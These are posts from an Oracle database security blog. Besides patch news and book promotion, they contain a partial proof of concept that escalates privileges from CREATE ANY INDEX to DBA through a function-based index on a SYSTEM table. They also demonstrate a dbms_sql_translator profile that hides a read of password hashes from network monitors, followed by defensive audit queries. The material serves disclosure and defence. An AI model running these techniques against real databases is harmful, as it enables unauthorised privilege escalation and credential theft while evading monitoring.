
July Security Alert

Hi Oracle Security Folks,

The July Oracle Security Alert is out. My part is smaller than last quarter, just an In-Depth Credit, but Mr David Litchfield makes a triumphal return with some excellent new research.
There is a CVSS 9 and a remote unauthenticated issue in this patch, so it is worth installing this one. I note that there is normally a dedicated security patch for Linux, but the Windows version is part of a larger bundle.

So the general advice is that there are still quite a lot of Index Function escalations, and it is especially important to check for INDEX privileges granted to PUBLIC on tables owned by privileged users.

For example:

select grantor from dba_tab_privs where privilege='INDEX' and grantee='PUBLIC';

Definitely worth tuning up the monitoring system to alert to unauthorised index usage!

In other news I noticed that the stealth SYS locking feature is now reverted by Oracle in – good move in my view. Maybe some more to come on this in the future.

Additionally, the has an excellent new In-Memory feature, but watch out for license implications as it is turned on by default.

There is a load more unpatched and unpublished research going round currently, but unfortunately I cannot discuss it here at this time.
However Apress are currently offering my new updated book at a very reasonable price at this URL
Springer are handling paper sales at this URL
Amazon are even offering my book in Kindle format

As time goes on 12c will eventually go out of date, but my “Protecting Oracle” book has material on Privileged Access Control which applies to all versions of Oracle moving forward, so I believe you will enjoy the read and find it a useful investment.

Stay safe,

April 2014 CPU

Hi Oracle Security Folks,

Thanks to Oracle for fixing a batch of research I sent over in August 2013 regarding ADVISOR, DIRECTORIES, GAOP (GRANT ANY OBJECT PRIVILEGE) and also a critical privilege escalation which is rated 8.5 in the CPU, which I am not going to publish here as I want to give folks time to patch. Both of the issues fixed in the April DB patch are from myself this time.

Note that the CVSS 8.5 was not discussed at any conferences – it’s new. Actually, the CVSS 8.5 is detailed in my new book, which has just come out after the patch release and is available from Apress and Amazon. There is some new exploit research in there, but the main thrust of the book is defence and protection – especially using Enterprise Manager/Cloud Control to defend an estate, and how to secure privileged access control mechanisms such as break-glass. I am very honoured that Jonathan Gennick edited the book, Arup Nanda technically reviewed the book, and that Slavik Markovich – CTO of McAfee – wrote a kind foreword to the book as well. There have also been quite a few other folks involved whom I list in the Acknowledgements section. It’s taken a year to write, so hopefully you will like it.

Anyhow, more detail to come on that in the future. For now I recommend installing the patch and reading the book… though it has to be said that that was where I was 9 months ago, and the world has not stopped spinning yet… Global SCN still rising :) but hopefully no maximum in sight yet!

Keep safe,


Hello Oracle Security Readers,

If we combine the following factors together, we can identify an escalation route from INDEX on SYSTEM to SYSDBA which does not require SELECT privileges on the indexed table:

1. SYSTEM passes its DBA role through its procedures.

2. Oracle indexes allow execution from read via functions, i.e. the INDEX privilege can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:

create user test identified by o;
grant create session, create procedure, create any index to test;

SQL*Plus: Release Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 

/  2    3    4    5    6    7    8   
Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle have made the above more difficult to achieve in 12c by adding an INHERIT privilege requirement, which blocks the above code and therefore represents another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues, due for publication in April and already available to purchase in Alpha format at this URL
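As an added defensive check (not code from the original post), the queries below extend the PUBLIC INDEX query from the July post above: they list who can build an index on SYS/SYSTEM tables, who holds CREATE ANY INDEX, and which existing function-based indexes on those schemas call code owned by a different schema, which is exactly the shape of the ESCALATION_INDEX in the PoC. The schema list ('SYS', 'SYSTEM') is an assumption; extend it to any schema whose definer's-rights code passes on its privileges.

```sql
-- Added checks, not part of the original post. Schema list is an assumption:
-- extend it to every schema whose definer's-rights code passes on privileges.

-- 1. INDEX object privilege on SYS/SYSTEM tables: PUBLIC, roles and users.
select p.grantee, p.owner, p.table_name, p.grantor, p.grantable
  from dba_tab_privs p
 where p.privilege = 'INDEX'
   and p.owner in ('SYS', 'SYSTEM')
 order by p.grantee, p.owner, p.table_name;

-- 2. Holders of CREATE ANY INDEX, the system privilege the PoC grants to TEST.
--    This reaches privileged schemas without any object-level grant at all.
select s.grantee, s.admin_option
  from dba_sys_privs s
 where s.privilege = 'CREATE ANY INDEX'
   and s.grantee not in ('SYS', 'SYSTEM', 'DBA')
 order by s.grantee;

-- 3. Function-based indexes on SYS/SYSTEM tables whose expression calls code
--    owned by a different schema (ESCALATION_INDEX -> TEST.Y in the PoC).
--    Oracle records the index-to-function dependency in DBA_DEPENDENCIES so
--    that it can disable the index when the function changes; that is what
--    the join uses. DBA_INDEXES does not record who issued CREATE INDEX, so
--    the index owner alone (SYSTEM here) tells you nothing about the creator.
select i.owner as index_owner, i.index_name, i.table_owner, i.table_name,
       i.funcidx_status, d.referenced_owner as code_owner,
       d.referenced_name as code_name, d.referenced_type as code_type
  from dba_indexes i
  join dba_dependencies d
    on d.owner = i.owner
   and d.name  = i.index_name
   and d.type  = 'INDEX'
 where i.funcidx_status is not null
   and i.table_owner in ('SYS', 'SYSTEM')
   and d.referenced_owner <> i.table_owner
 order by i.table_owner, i.table_name, i.index_name;

-- Any row from query 3 is a candidate for DROP INDEX once the owner of the
-- referenced code has been confirmed; rows from 1 and 2 are grants to review.
```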

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly, there has still been a large focus on network monitoring to implement DB security. I say surprisingly because new DB security research has for a while been focused on controlling internal high privilege within the DB. A privileged account can bypass network monitoring even if it is host based. A good example of bypassing a host-based network monitor (e.g. SNORT/Guardium et al) is the dbms_sql_translator package introduced with 12c, demonstrated below:

conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';


SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$')

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;




To achieve this monitoring bypass, all that is required is the CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed.

And there are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready-made methods to alert on the unauthorised use of dbms_sql_translator are the native audit trail or, for high security scenarios, a memory monitor such as McAfee’s DB Sec monitoring tool here, which provides high protection.
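Added 12c checks and an audit policy (not from the original post) for the translation-profile bypass shown above: the queries enumerate existing profiles, their registered translations and the privileges that let a user create or use one, and the unified audit policy records executions of dbms_sql_translator in the native trail. View and column names are those of the 12c DBA_SQL_TRANSLATION_PROFILES, DBA_SQL_TRANSLATIONS and UNIFIED_AUDIT_TRAIL views; BYPASSNETMON is the profile from the demo, and the policy name translator_use is my own choice.

```sql
-- Added checks, not part of the original post. BYPASSNETMON is the demo
-- profile above; translator_use is an arbitrary policy name.

-- 1. Every translation profile and its translator package. Outside a real
--    legacy-application migration this list should normally be empty.
select owner, profile_name, translator_owner, translator_name
  from dba_sql_translation_profiles
 order by owner, profile_name;

-- 2. Registered text pairs: the monitor sees SQL_TEXT on the wire while the
--    server runs TRANSLATED_TEXT, so every pair needs a human review.
select owner, profile_name, enabled, sql_text, translated_text
  from dba_sql_translations
 where profile_name = 'BYPASSNETMON'   -- drop this predicate to see them all
 order by owner, profile_name;

-- 3. Who could have created or can use a profile. The privilege is only
--    needed at creation time, so a clean result today does not clear the
--    past; roles appear here as grantees too.
select grantee, privilege, admin_option
  from dba_sys_privs
 where privilege in ('CREATE SQL TRANSLATION PROFILE',
                     'CREATE ANY SQL TRANSLATION PROFILE',
                     'USE ANY SQL TRANSLATION PROFILE')
 order by privilege, grantee;

-- 4. Unified audit policy (12c): record use of the profile-creation
--    privileges and every execution of the package. Works in the default
--    mixed-mode auditing as well as pure unified auditing.
create audit policy translator_use
  privileges create sql translation profile,
             create any sql translation profile
  actions execute on sys.dbms_sql_translator;
audit policy translator_use;

-- 5. Read the trail back, newest first.
select event_timestamp, dbusername, action_name,
       object_schema, object_name, sql_text
  from unified_audit_trail
 where unified_audit_policies like '%TRANSLATOR_USE%'
 order by event_timestamp desc;
```

Step 4 does not cover the ALTER SESSION that activates a profile, so pair the trail with the profile inventory from steps 1 and 2 rather than relying on the audit records alone.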

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defences. The new book adds the following protections, among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!


Paul M. Wright

P.S. Commenting works now, as the Maths Captcha plugin has dealt with the spambots.